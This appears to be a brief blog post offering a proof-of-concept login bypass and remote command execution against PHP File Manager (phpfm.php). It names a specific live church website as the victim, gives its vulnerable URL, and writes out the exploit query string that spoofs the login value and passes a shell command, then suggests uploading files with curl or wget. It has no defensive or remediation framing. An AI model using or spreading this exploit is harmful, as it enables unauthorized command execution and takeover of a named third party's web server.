PHP File Manager bypass login with Remote code execution
Poc URLs :
victim : http://malayattoorchurch.com
bug : http://malayattoorchurch.com/gallery/phpfm.php
exploit :
?blockKeys[0]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd=
example :
http://malayattoorchurch.com/gallery/phpfm.php
You can upload your files with curl or wget
No comments:
Post a Comment